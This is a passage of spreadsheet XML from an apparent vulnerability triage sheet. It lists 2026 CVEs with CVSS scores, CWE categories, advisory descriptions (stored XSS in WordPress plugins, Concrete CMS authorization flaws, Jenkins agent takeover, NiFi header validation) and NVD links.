      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr"/>
      <c r="Q652" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 has a pcre2_match out-of-bounds read during the PCRE2_MATCH_INVALID_UTF matching of an invalid UTF subject.</t>
        </is>
      </c>
      <c r="S652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89160</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54165</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr"/>
      <c r="Q653" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>Dobase is an open-source, self-hosted workspace with installable tools. Versions prior to 2026.06.03 have a one-click stored DOM-based cross-site scripting (XSS) vulnerability in the public, unauthenticated shared-folder image gallery. A file's `name` is fully attacker-controlled and is never sanitized. It is round-tripped through an ERB-escaped `data-name` attribute, decoded back to its raw value by `el.dataset.name`, and then re-injected into `innerHTML` by the `public-gallery` Stimulus controller with no escaping. Any authenticated workspace member who can share a Files folder can store a payload; the victim is anyone with the public share link (no authentication required). The global Content-Security-Policy is sent report-only (not enforcing), so an inline `onerror` handler executes — this is an executing XSS, not a CSP-mitigated injection. Version 2026.06.03 fixes the issue.</t>
        </is>
      </c>
      <c r="S653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54165</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6640</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr"/>
      <c r="Q654" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_link_attributes' parameter in all versions up to, and including, 3.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6640</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6641</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr"/>
      <c r="Q655" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to and including 3.35. This is due to insufficient input sanitization and output escaping on the mla_link_href parameter when mla_output is set to 'paginate_links', where the _paginate_links() function processes the value through mla_process_shortcode_parameter() and _replace_query_parameter() without proper URL escaping, then outputs it directly in href attributes without applying esc_url(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6641</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6642</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr"/>
      <c r="Q656" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bulk edit preset export/import mechanism in versions up to and including 3.35. This is due to insufficient output escaping on preset field values when they are rendered in HTML attribute contexts in the mla_generate_bulk_edit_form_fieldsets() function and mla-bulk-edit-fieldsets.tpl template. While wp_kses() filtering is applied during preset export for users without unfiltered_html capability, this does not prevent attribute injection attacks since the malicious payload consists of quotes and HTML attributes rather than HTML tags. When preset values are retrieved and rendered, they are directly assigned to template variables without esc_attr() escaping and then inserted into input element value attributes via simple string replacement. This makes it possible for authenticated attackers, with Author-level access and above (upload_files capability), to inject arbitrary web scripts that execute when an administrator imports the poisoned preset and the targeted input field receives focus.</t>
        </is>
      </c>
      <c r="S656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6642</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7438</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr"/>
      <c r="Q657" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>The Bold Timeline Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `supertitle` and `subtitle` attributes of the `bold_timeline_item` shortcode in all versions up to, and including, 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S657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7438</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77187</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr"/>
      <c r="Q658" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R658" s="5" t="inlineStr">
        <is>
          <t>The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77187</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79974</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr"/>
      <c r="Q659" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Authentication vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79974</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18121</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr"/>
      <c r="Q660" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9.5.2 and below is vulnerable to an authorization bypass (IDOR) because the frontend calendar lightbox endpoint (/ccm/calendar/view_event/{bID}/{occurrence_id}) does not verify that the caller is permitted to view the calendar that owns the requested event occurrence. The controller loads the occurrence directly from an attacker‑supplied, sequential identifier without confirming that it belongs to the calendar configured on the referenced block. An unauthenticated visitor who can render any public calendar block with lightbox properties enabled could therefore supply an arbitrary occurrence identifier and disclose event metadata — title, date, description, page link, and configured event attributes — from calendars they are not permitted to view. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="S660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18121</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49992</t>
        </is>
      </c>
      <c r="D661" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr"/>
      <c r="Q661" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>Kimai is an open-source time tracking application. Versions prior to 2.58.0 contain authenticated cross-site request forgery issues in their default team creation shortcuts for projects, customers, and activities. These endpoints are exposed through `GET` routes and directly create or reuse a `Team`, add the current user as teamlead, and bind the target object to that team. As a result, an attacker can trick a logged-in user with the required permissions into visiting a malicious page and cause unauthorized changes to team, teamlead, and object-binding relationships. This is a real authorization-structure modification issue rather than a harmless UI shortcut. Version 2.58.0 patches the issue.</t>
        </is>
      </c>
      <c r="S661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49992</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54665</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-jetty</t>
        </is>
      </c>
      <c r="M662" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr"/>
      <c r="P662" s="5" t="inlineStr"/>
      <c r="Q662" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R662" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 0.0.1 through 2.9.0 support building qualified URLs from one of several HTTP request headers that provide an alternative to the standard Host header without validating the values provided. Apache NiFi 1.6.0 introduced a configurable application property to restrict values provided in the HTTP Host header, but did not apply the validation to alternative Proxy and Forwarded headers. The absence of proxy host header validation allowed a client to instruct Apache NiFi web services to construct invalid qualified URLs for redirection or data references. Upgrading to Apache NiFi 2.10.0 is the recommended mitigation, which implements validation for the X-ProxyHost and X-Forwarded-Host HTTP request headers based on the nifi.web.proxy.host property. Enabling header validation requires configuring the application with HTTPS. Reverse proxy servers in front of Apache NiFi are responsible for filtering input request headers and providing allowed values to the application.</t>
        </is>
      </c>
      <c r="S662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54665</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81824</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr"/>
      <c r="Q663" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t>
        </is>
      </c>
      <c r="S663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81905</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr"/>
      <c r="Q664" s="5" t="inlineStr">
        <is>
          <t>CWE-640, CWE-863</t>
        </is>
      </c>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.3 stores user validation hashes for multiple purposes (email/registration validation, password reset, and persistent login) in a single table with a type column, but the redemption path resolves a hash by value alone and does not verify its type. As a result, a hash issued for one purpose can be redeemed for another: a long-lived registration hash (60-day expiry) can be submitted to the password-change endpoint to set a new password on the target account, and a password-reset hash can be submitted to the email-validation endpoint to activate an account. Exploitation requires the attacker to first obtain a valid hash through a separate channel (for example email interception, log exposure, or SSRF against an internal mail relay), so the flaw amplifies the impact of any hash disclosure rather than creating a standalone entry point. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="S664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81905</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81906</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr"/>
      <c r="Q665" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R665" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS OAuth callback login path prior to version 9.5.3 did not check whether an account was active or email-validated before establishing a session. A deactivated or unvalidated user with an existing OAuth binding could complete authentication and receive a session that was fully authenticated for the callback response, with the login recorded and login events dispatched. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="S665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81906</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84651</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K666" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr"/>
      <c r="Q666" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, the REST API and CLI endpoints for updating agent configuration do not prevent a submitted configuration from overwriting a different agent by specifying that agent's name in the submitted XML document, allowing attackers with Agent/Configure permission on one agent to take over a different agent, gaining control of its configuration and obtaining access to its inbound agent secret and environment variables.</t>
        </is>
      </c>
      <c r="S666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84651</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90455</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
